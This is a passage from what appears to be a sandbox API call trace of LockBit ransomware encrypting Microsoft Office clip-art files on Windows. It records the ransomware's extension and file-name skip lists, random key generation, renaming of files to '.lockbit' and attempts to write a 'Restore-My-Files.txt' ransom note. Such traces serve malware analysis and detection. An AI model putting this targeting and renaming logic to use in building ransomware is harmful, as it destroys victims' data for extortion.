Office\\CLIPART\\PUB60COR\\SL00286_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00286_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.740] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.741] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.742] free (_Block=0x1fa2ed8) [0173.742] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00286_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.742] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.742] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.742] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ab6f00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x38ab6f00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1268, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00298_.WMF", cAlternateFileName="")) returned 1 [0173.742] lstrcmpiW (lpString1=".", lpString2="SL00298_.WMF") returned -1 [0173.742] lstrcmpiW (lpString1="..", lpString2="SL00298_.WMF") returned -1 [0173.742] PathFindExtensionW (pszPath="SL00298_.WMF") returned=".WMF" [0173.742] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.742] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.743] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.743] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00298_.WMF") returned -1 [0173.744] lstrcmpiW (lpString1="ntldr", lpString2="SL00298_.WMF") returned -1 [0173.744] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00298_.WMF") returned -1 [0173.744] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00298_.WMF") returned -1 [0173.744] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00298_.WMF") returned -1 [0173.744] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00298_.WMF") returned 1 [0173.744] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00298_.WMF") returned -1 [0173.744] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.744] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00298_.WMF") returned=".WMF" [0173.744] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.744] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.744] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.745] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.745] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00298_.WMF.lockbit") returned 72 [0173.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00298_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.750] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.750] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.750] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4712) returned 1 [0173.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.751] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.753] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00298_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00298_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.753] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.754] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.755] free (_Block=0x1fa2ed8) [0173.755] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00298_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.755] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.755] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.755] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89bcf00, ftCreationTime.dwHighDateTime=0x1bd4b1a, ftLastAccessTime.dwLowDateTime=0x5a980590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe89bcf00, ftLastWriteTime.dwHighDateTime=0x1bd4b1a, nFileSizeHigh=0x0, nFileSizeLow=0x20e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00308_.WMF", cAlternateFileName="")) returned 1 [0173.755] lstrcmpiW (lpString1=".", lpString2="SL00308_.WMF") returned -1 [0173.755] lstrcmpiW (lpString1="..", lpString2="SL00308_.WMF") returned -1 [0173.755] PathFindExtensionW (pszPath="SL00308_.WMF") returned=".WMF" [0173.755] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.755] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.756] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.756] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00308_.WMF") returned -1 [0173.757] lstrcmpiW (lpString1="ntldr", lpString2="SL00308_.WMF") returned -1 [0173.757] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00308_.WMF") returned -1 [0173.757] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00308_.WMF") returned -1 [0173.757] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00308_.WMF") returned -1 [0173.757] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00308_.WMF") returned 1 [0173.757] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00308_.WMF") returned -1 [0173.757] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.757] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00308_.WMF") returned=".WMF" [0173.757] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.757] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.757] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.758] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.758] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00308_.WMF.lockbit") returned 72 [0173.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00308_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00308_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.759] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.760] malloc (_Size=0x40068) returned 0x3e70008 [0173.760] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8416) returned 1 [0173.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0173.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0173.761] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.778] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00308_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00308_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.778] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.778] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.779] free (_Block=0x1fa2ed8) [0173.779] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00308_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.779] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.779] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.779] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81165d00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5a980590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81165d00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xae4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00345_.WMF", cAlternateFileName="")) returned 1 [0173.779] lstrcmpiW (lpString1=".", lpString2="SL00345_.WMF") returned -1 [0173.779] lstrcmpiW (lpString1="..", lpString2="SL00345_.WMF") returned -1 [0173.779] PathFindExtensionW (pszPath="SL00345_.WMF") returned=".WMF" [0173.779] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.779] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.779] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.780] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.780] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00345_.WMF") returned -1 [0173.781] lstrcmpiW (lpString1="ntldr", lpString2="SL00345_.WMF") returned -1 [0173.781] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00345_.WMF") returned -1 [0173.781] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00345_.WMF") returned -1 [0173.781] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00345_.WMF") returned -1 [0173.781] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00345_.WMF") returned 1 [0173.781] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00345_.WMF") returned -1 [0173.781] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.781] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft 